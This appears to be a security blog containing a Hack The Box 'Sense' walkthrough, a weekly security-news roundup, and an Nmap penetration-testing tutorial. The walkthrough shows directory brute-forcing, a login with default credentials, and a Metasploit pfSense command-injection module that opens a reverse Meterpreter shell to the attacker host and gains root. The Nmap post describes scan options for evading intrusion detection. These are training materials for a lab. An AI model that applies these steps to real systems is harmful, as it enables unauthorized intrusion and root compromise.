10/07/2024

HTB: Sense

 ___  ___  _________  ________                         
|\  \|\  \|\___   ___\\   __  \  ___                   
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                  
 \ \   __  \   \ \  \ \ \   __  \|__|                  
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                
   \ \__\ \__\   \ \__\ \ \_______\|\__\               
    \|__|\|__|    \|__|  \|_______|\|__|               
 ________  _______   ________   ________  _______      
|\   ____\|\  ___ \ |\   ___  \|\   ____\|\  ___ \     
\ \  \___|\ \   __/|\ \  \\ \  \ \  \___|\ \   __/|    
 \ \_____  \ \  \_|/_\ \  \\ \  \ \_____  \ \  \_|/__  
  \|____|\  \ \  \_|\ \ \  \\ \  \|____|\  \ \  \_|\ \ 
    ____\_\  \ \_______\ \__\\ \__\____\_\  \ \_______\
   |\_________\|_______|\|__| \|__|\_________\|_______|
   \|_________|                   \|_________|         
                                                            

Hack The Box's Sense is an Easy OpenBSD machine that features pfSense, an open-source firewall software. This machine uses basic directory brute-forcing using Gobuster to search for a user credential text file to gain access to the firewall, followed by an injection attack to gain root access to the machine.

After starting the machine on HTB and connecting to your HTB VPN, open a terminal and ping the machine's IP address to confirm it is reachable. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.10.10.60

You should receive responses from the IP address. Press CTRL + C to stop sending packets to the target host. Once we have confirmed the host is reachable, it's time to move on to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.10.10.60
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-02 11:17 CDT
Nmap scan report for 10.10.10.60
Host is up (0.0091s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.98 seconds

We can see a web server running. Let's navigate to the site by entering the target's IP address in our web browser. Upon inspection we see a login page for pfSense, an open-source firewall software based on FreeBSD. A quick Google search for the default pfSense credentials shows the default username is "admin" and the password is "pfsense". When we try these default credentials, we are told they are incorrect. Let's move on to using Gobuster to brute-force directories on the server. We'll search for .php and .txt files using the directory-list-2.3-medium.txt wordlist.

gobuster dir -u https://10.10.10.60/ -t 50 -x php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.60/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://10.10.10.60/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://10.10.10.60/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://10.10.10.60/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://10.10.10.60/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://10.10.10.60/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://10.10.10.60/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://10.10.10.60/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://10.10.10.60/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://10.10.10.60/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://10.10.10.60/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]

After some time, we will notice /system-users.txt in the output above. This file is interesting because it could contain user login information. We can view it by navigating to the path on the web server in our web browser; on my spawned HTB machine that is https://10.10.10.60/system-users.txt. We get the following page with a support ticket containing credentials:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

We see the username listed as "Rohit" and the password as "company defaults". After testing these credentials on the pfSense login page, we see we are not granted access. But let's try the default pfSense password, "pfsense". Upon using these credentials we see we are granted access!
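Spotting the one interesting file in a long Gobuster listing by eye is easy to get wrong, which is how a credential file like the one above goes unnoticed in an audit. The following Python helper is an added example, not part of the original write-up: it parses Gobuster's "dir" output lines (the SAMPLE_OUTPUT is a constructed subset of the listing above) into records and flags directly readable files whose extension commonly indicates leftover plain-text material that a web root should never serve. The SENSITIVE_SUFFIXES list is an assumption of this example, not a Gobuster feature.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: a subset of the Gobuster listing shown in the write-up above.
SAMPLE_OUTPUT = """\
/index.php            (Status: 200) [Size: 6690]
/themes               (Status: 301) [Size: 0] [--> https://10.10.10.60/themes/]
/changelog.txt        (Status: 200) [Size: 271]
/xmlrpc.php           (Status: 200) [Size: 384]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://10.10.10.60/filebrowser/]
"""

# One Gobuster result line: path, status, size and an optional redirect target.
LINE_RE = re.compile(
    r"^(?P<path>/\S*)\s+\(Status:\s*(?P<status>\d{3})\)\s+\[Size:\s*(?P<size>\d+)\]"
    r"(?:\s+\[-->\s*(?P<redirect>\S+)\])?\s*$"
)


@dataclass
class Hit:
    path: str
    status: int
    size: int
    redirect: Optional[str] = None


def parse_gobuster(text: str) -> List[Hit]:
    """Turn Gobuster output into Hit records; banner and separator lines are skipped."""
    hits: List[Hit] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            hits.append(Hit(m["path"], int(m["status"]), int(m["size"]), m["redirect"]))
    return hits


# Extensions that commonly carry plain-text secrets when left in a web root
# (assumed list for this example; extend it to fit the application being reviewed).
SENSITIVE_SUFFIXES = (".txt", ".bak", ".old", ".conf", ".cfg", ".env", ".log", ".sql")


def flag_sensitive(hits: List[Hit]) -> List[Hit]:
    """Return directly readable (HTTP 200) files whose name suggests leaked material."""
    return [h for h in hits if h.status == 200 and h.path.lower().endswith(SENSITIVE_SUFFIXES)]


if __name__ == "__main__":
    for h in flag_sensitive(parse_gobuster(SAMPLE_OUTPUT)):
        print(f"review {h.path} ({h.size} bytes)")
```

Run against a saved Gobuster log (gobuster's -o option writes the same line format) and review every flagged path; on this box the two hits are /changelog.txt and /system-users.txt, and the second is the one that matters.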

Let's fire up Metasploit and search for potential exploits for pfSense:

msfconsole
Metasploit tip: To save all commands executed since start up to a file, use the 
makerc command
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.3.44-dev                          ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search pfsense

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  exploit/unix/http/pfsense_clickjacking          2017-11-21       normal     No     Clickjacking Vulnerability In CSRF Error Page pfSense
   1  exploit/unix/http/pfsense_diag_routes_webshell  2022-02-23       excellent  Yes    pfSense Diag Routes Web Shell Upload
   2  exploit/unix/http/pfsense_config_data_exec      2023-03-18       excellent  Yes    pfSense Restore RRD Data Command Injection
   3  exploit/unix/http/pfsense_graph_injection_exec  2016-04-18       excellent  No     pfSense authenticated graph status RCE
   4  exploit/unix/http/pfsense_group_member_exec     2017-11-06       excellent  Yes    pfSense authenticated group member RCE
   5  exploit/unix/http/pfsense_pfblockerng_webshell  2022-09-05       great      Yes    pfSense plugin pfBlockerNG unauthenticated RCE as root


Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/http/pfsense_pfblockerng_webshell

[msf](Jobs:0 Agents:0) >> 

We see option #3 is a module for an injection attack that requires authentication, which we now have. You can read more about this specific exploit on Rapid7's website here. Let's select this attack and fill out the required exploit options:

use 3
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> options

Module options (exploit/unix/http/pfsense_graph_injection_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  pfsense          yes       Password to login with
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit
                                        /basics/using-metasploit.html
   RPORT     443              yes       The target port (TCP)
   SSL       true             no        Negotiate SSL/TLS for outgoing connections
   USERNAME  admin            yes       User to login with
   VHOST                      no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set RHOSTS 10.10.10.60
RHOSTS => 10.10.10.60
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set USERNAME rohit
USERNAME => rohit
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> set LHOST tun0
LHOST => 10.10.14.6
[msf](Jobs:0 Agents:0) exploit(unix/http/pfsense_graph_injection_exec) >> 

We set RHOSTS to the target IP address, USERNAME to "rohit", and LHOST to the interface (tun0) whose address we want to listen on for the reverse TCP connection. We can now run the exploit with "exploit":

exploit

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Payload uploaded successfully, executing
[*] Sending stage (39927 bytes) to 10.10.10.60
[+] Deleted uz
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.60:53021) at 2024-10-02 12:06:53 -0500

(Meterpreter 1)(/var/db/rrd) > getuid
Server username: root
(Meterpreter 1)(/var/db/rrd) > 

Once the reverse TCP connection is established, the "getuid" command shows we now have root access to the machine! You can now navigate the target system to obtain the user and root .txt flags.

10/04/2024

CyberChannel: Week of 9/29/24

CUPS Vulnerability Could Amplify DDoS Attacks by 600 Times

A recently patched vulnerability in the Common Unix Printing System (CUPS) has emerged as a potential tool for cyber criminals. This flaw can be exploited to launch Distributed Denial-of-Service (DDoS) attacks with a significant amplification factor of 600 times. This means attackers can use a small amount of traffic to overwhelm a targeted server with a much larger volume, making it inaccessible to legitimate users.

Researchers discovered that chaining this CUPS flaw with three other vulnerabilities could potentially allow remote code execution on Unix-like systems. However, the primary concern lies in its DDoS amplification capabilities. Thankfully, patches are available to address this issue. System administrators are urged to update their CUPS installations to mitigate the risk and prevent their servers from being used in DDoS attacks.

"Pig Butchering" Apps Preying on App Store Users

"Pig butchering" scams have been discovered on both the Google Play Store and Apple's App Store. These fraudulent trading apps lure victims with promises of high returns on fake cryptocurrencies. Once users invest, their funds are stolen by the scammers. It's important to be cautious when downloading investment apps and to research the developer and user reviews before investing any money.

To avoid falling victim to these scams, users should be wary of unsolicited investment offers. It's also important to verify the legitimacy of the trading platform and the cryptocurrency before investing. Additionally, users should never share their personal or financial information with strangers.

Cloudflare Blocks 3.8 Tbps DDoS Attack, Setting New Record

Cloudflare, a web security company, recently thwarted a record-breaking distributed denial-of-service (DDoS) attack. The attack peaked at a staggering 3.8 terabits per second (Tbps) and lasted for 65 seconds. The attackers launched the attack by exploiting a network of vulnerable devices, including Asus routers and MikroTik systems. This attack is the largest publicly recorded DDoS attack ever observed.

In comparison to previous large-scale DDoS attacks, this attack stands out due to its volume and duration. DDoS attacks work by overwhelming a target server with traffic, making it unavailable to legitimate users.

Evasive Linux Malware Enables Widespread Cryptomining

A stealthy malware campaign targeting Linux servers for years has finally come to light. The malware, dubbed "perfctl," has likely infected millions of servers and caused significant disruption. Researchers believe perfctl has been active for at least three years, exploiting vulnerabilities in Polkit (CVE-2021-4043) to escalate privileges and install cryptomining software.

Perfctl is particularly dangerous due to its evasive tactics. It avoids detection by stopping its activities when a new user logs in, only resuming once the user becomes idle again. Additionally, it deletes its own binary after execution, further enhancing its stealth. This highlights the importance of keeping systems updated and implementing strong security measures to protect against evolving cyber threats like perfctl.

FIN7 Targets Users with Deepfake Nude Generators to Spread Malware

There is a new tactic used by FIN7 hackers to spread malware. FIN7 is a cybercrime group known for sophisticated phishing and social engineering attacks. In this new campaign, FIN7 is creating fake AI-powered deepnude generator sites. These sites are designed to lure people interested in generating nude images using deepfakes. When users try to download the generated images, they are unknowingly downloading malware instead.

This is not the first time FIN7 has used social engineering to spread malware. FIN7 has been distributing NetSupport RAT and other malware through similar tactics. NetSupport RAT is a remote access trojan that allows attackers to take control of infected devices.

UMC Health System Impacted by Ransomware, Patients Diverted

The UMC Health System in Texas was recently impacted by a ransomware attack. This disrupted their IT infrastructure, forcing them to take critical measures to contain the incident. While their facilities remained open, some emergency and non-emergency patients had to be diverted to other locations.

UMC took immediate action to disconnect their systems and launched an investigation. As of now, no major ransomware group has claimed responsibility for the attack. This incident highlights the potential consequences of cyberattacks on critical infrastructure like healthcare systems. The disruption caused by the attack emphasizes the importance of robust cybersecurity measures in protecting patient care and hospital operations.

LockBit Ransomware Gang Hit with Global Crackdown

In a global effort to crack down on the LockBit ransomware gang, law enforcement from twelve countries have joined forces. This resulted in the arrest of four individuals connected to the cyber criminal group. These arrests included a developer, a bulletproof hosting service administrator, and two others associated with LockBit activity.

The operation not only involved arrests but also the seizure of LockBit infrastructure and the release of a decryption tool. This tool allows victims to recover their encrypted files for free. Additionally, authorities issued indictments targeting other LockBit affiliates and offered a substantial reward for information leading to the capture of the gang's leadership. These actions demonstrate international cooperation in combating ransomware threats and potentially offer relief to victims of LockBit attacks.

Hacker Steals Confidential Data for Profit

A British citizen, Robert B. Westbrook, has been charged by the U.S. Securities and Exchange Commission (SEC) for hacking into the computer systems of five public American companies. His goal was to access confidential earnings information before it was made public.

Westbrook allegedly used this stolen information to make profitable stock trades ahead of earnings announcements. Over a period of 18 months, between January 2019 and August 2020, he made an estimated $3.75 million in illegal profits through insider trading. The SEC alleges that Westbrook reset the passwords of senior executives to gain access to documents and emails containing financial reports. He then used anonymous email accounts, VPN services, and Bitcoin to conceal his identity while making the illicit investments. However, the SEC was eventually able to track him down using data analytics.

9/30/2024

Nmap Basics for Penetration Testing

          ___.-------.___
      _.-' ___.--;--.___ `-._
   .-' _.-'  /  .+.  \  `-._ `-.
 .' .-'      |-|-o-|-|      `-. `.
(_ <O__      \  `+'  /      __O> _)
  `--._``-..__`._|_.'__..-''_.--'
        ``--._________.--''

Nmap, short for Network Mapper, is a free and open-source tool widely used for network discovery and security auditing. Nmap utilizes raw IP packets in innovative ways to gather information about a network. It can identify available hosts, running services (including application name and version), operating systems, firewalls or packet filters in use, and many other details. Designed for rapid scanning of large networks, Nmap also works effectively for single hosts.

Network administrators rely on Nmap for various tasks, including creating network inventories, managing service upgrades, and monitoring uptime of hosts and services, while hackers may use it for enumeration, i.e. identifying open ports and running services that may be exploitable.

Nmap is available for most operating systems and comes preinstalled on the Kali Linux distribution. Remember to replace the placeholder IP address with your target IP address. You can also test this out against the practice host scanme.nmap.org. Let's start with a basic Nmap scan. We can scan using an IP address or a host name, e.g. scanme.nmap.org:

nmap 192.168.1.1

We can also scan a list of network/host targets from a text file with the following command, where "ip_list.txt" is the path to the text file.

nmap -iL ip_list.txt 

When performing a penetration test on a network, we may want to perform a ping sweep scan, which pings all available hosts on a network by sending ICMP packets and returns the live hosts. Conducting a ping sweep is a crucial part of identifying active hosts on a network and lays the groundwork for a penetration test.

nmap -sn 192.168.0.0/24

Once we have the list of live hosts, we can port-scan the individual hosts. Note the "/24" suffix on the IP address. This sets the IP address range: Nmap will send an ICMP echo request to every IP address in the network from 192.168.0.1 to 192.168.0.255.

Nmap defaults to scanning the 1000 most commonly used ports. Port specification and scan order refer to the process of selecting which ports to scan during network reconnaissance. This is crucial for efficient scanning as it allows you to exclude irrelevant ports and prioritize the scan based on port usage frequency.

We can specify ports using the following command:

nmap -p 22,80,443 192.168.1.1

We can also try to detect the operating system. This information helps pinpoint vulnerabilities specific to the operating system, enabling more effective attacks on the target system. We can use "-O" to enable OS detection.

nmap -O 192.168.1.1

What if we want to detect the services being run on open ports on the network? The service/version detection feature in Nmap provides valuable insights into the target system, enabling you to identify vulnerabilities and weaknesses on those ports. This option can be enabled by using "-sV".

nmap -sV 192.168.1.1

With the returned information, we can query a tool such as searchsploit for possible exploits affecting these services.

One of the most popular scans used is the SYN scan. A SYN scan involves sending a SYN packet to the target host and monitoring for a response. If the target responds with a SYN/ACK packet, the port is open; if it responds with an RST packet, the port is closed. This half-open scan technique, which doesn't complete the full TCP three-way handshake, is fast and, most importantly, stealthy, ideal for mapping large networks.

nmap -sS 192.168.1.1

Being stealthy is an important part of penetration testing. Some firewalls and Intrusion Detection System (IDS) solutions may temporarily block IP addresses that exhibit unusual network activity, such as high traffic volumes or sending network packets to multiple hosts in a systematic manner. We can reduce these risks by using options that affect the scan's order and timing.

We can add the "-T" option to change the scan's timing template. By default, Nmap uses the "-T2" timing template, but we can slow the scan down using the "-T1" or "-T0" templates. These slow down the scan but minimize the impact on the network and help avoid triggering alerts.

nmap -T1 192.168.0.0/24

You can also slow down an Nmap scan by adding a delay between probes. Use the "--scan-delay" option and specify the desired delay time in seconds.

nmap --scan-delay 3s 192.168.0.0/24

Let's change the order in which targets are scanned. Nmap's --randomize-hosts option shuffles the target order, making the scan less predictable and harder for security monitoring to spot.

nmap --randomize-hosts 192.168.0.0/24
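The timing options above work because most scan detection counts distinct ports or hosts contacted by one source inside a fixed time window. The Python script below is an added example, not part of the original post, written from the detection side: it parses a constructed, hypothetical firewall SYN log (the line format is this example's own, not a real product's) and flags sources that probe many ports on one host (a vertical scan like -sS on a single target) or one port across many hosts (a sweep like -sn across a /24). The sample traffic includes the same 20-port scan run fast and run with a 3-second delay between probes, so the test shows what the delay buys: with a 30-second window only the fast scan and the sweep are caught, while a 120-second window catches the slow scan too. The window and threshold values are assumptions chosen for the sample.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Set

# Constructed log format (hypothetical firewall, not from any real product):
# 2024-10-02T11:17:00+00:00 SYN src=10.10.14.6 dst=192.168.0.10 dport=22
LINE_RE = re.compile(r"^(?P<ts>\S+) SYN src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+)$")


@dataclass(frozen=True)
class SynEvent:
    ts: datetime
    src: str
    dst: str
    dport: int


def parse_log(lines: List[str]) -> List[SynEvent]:
    """Parse SYN log lines into events sorted by time; unparseable lines are ignored."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(SynEvent(datetime.fromisoformat(m["ts"]), m["src"], m["dst"], int(m["dport"])))
    return sorted(events, key=lambda e: e.ts)


def build_sample_log() -> List[str]:
    """Constructed traffic: a fast 20-port scan, the same scan with a 3 s delay between
    probes, a port-80 sweep across 30 hosts, and a workstation talking to a few services."""
    t0 = datetime(2024, 10, 2, 11, 17, tzinfo=timezone.utc)
    lines: List[str] = []

    def add(t: datetime, src: str, dst: str, dport: int) -> None:
        lines.append(f"{t.isoformat()} SYN src={src} dst={dst} dport={dport}")

    ports = [21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443, 445, 993, 995, 1723, 3306, 3389, 5900, 8080]
    for i, p in enumerate(ports):                 # fast scan: 20 ports in under 2 s
        add(t0 + timedelta(milliseconds=100 * i), "10.10.14.6", "192.168.0.10", p)
    for i, p in enumerate(ports):                 # slow scan: same ports, 3 s apart (--scan-delay 3s)
        add(t0 + timedelta(seconds=3 * i), "10.10.14.7", "192.168.0.10", p)
    for i in range(1, 31):                        # sweep: port 80 on 30 hosts in 15 s
        add(t0 + timedelta(milliseconds=500 * i), "10.10.14.8", f"192.168.0.{i}", 80)
    for i, p in enumerate([80, 443, 53]):         # benign: three services on the gateway
        add(t0 + timedelta(seconds=10 * i), "192.168.0.50", "192.168.0.1", p)
    return lines


def detect_scans(events: List[SynEvent], window_s: int, threshold: int = 15) -> Dict[str, Set[str]]:
    """Flag a source 'vertical' if it probes >= threshold distinct ports on one host, or
    'horizontal' if it probes one port on >= threshold distinct hosts, within any window."""
    by_src: Dict[str, List[SynEvent]] = defaultdict(list)
    for e in events:
        by_src[e.src].append(e)
    window = timedelta(seconds=window_s)
    findings: Dict[str, Set[str]] = defaultdict(set)
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end, e in enumerate(evs):
            while evs[start].ts < e.ts - window:  # slide the window start forward
                start += 1
            ports_per_dst: Dict[str, Set[int]] = defaultdict(set)
            dsts_per_port: Dict[int, Set[str]] = defaultdict(set)
            for w in evs[start:end + 1]:
                ports_per_dst[w.dst].add(w.dport)
                dsts_per_port[w.dport].add(w.dst)
            if any(len(s) >= threshold for s in ports_per_dst.values()):
                findings[src].add("vertical")
            if any(len(s) >= threshold for s in dsts_per_port.values()):
                findings[src].add("horizontal")
    return dict(findings)


if __name__ == "__main__":
    evs = parse_log(build_sample_log())
    print("30 s window :", detect_scans(evs, 30))
    print("120 s window:", detect_scans(evs, 120))
```

The lesson for the defender is the mirror image of the tutorial's advice: a slow scan is not invisible, it only needs a longer window (or a per-source running count that never resets) to show up, at the cost of more state per source.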

One of the most powerful features of Nmap is its ability to run scripts. The Nmap Scripting Engine (NSE) runs scripts written in the Lua programming language.

For example, the following command runs the "http-headers" script, which retrieves the HTTP headers sent by the target web server.

nmap --script http-headers scanme.nmap.org

As a penetration tester, you may want to run the "vulners" script, which lists known vulnerabilities for the detected services using the Vulners CVE database. It matches on the version information gathered by "-sV", so run it with version detection enabled:

nmap -sV --script vulners 192.168.1.1

There are hundreds of NSE scripts available which you can view here.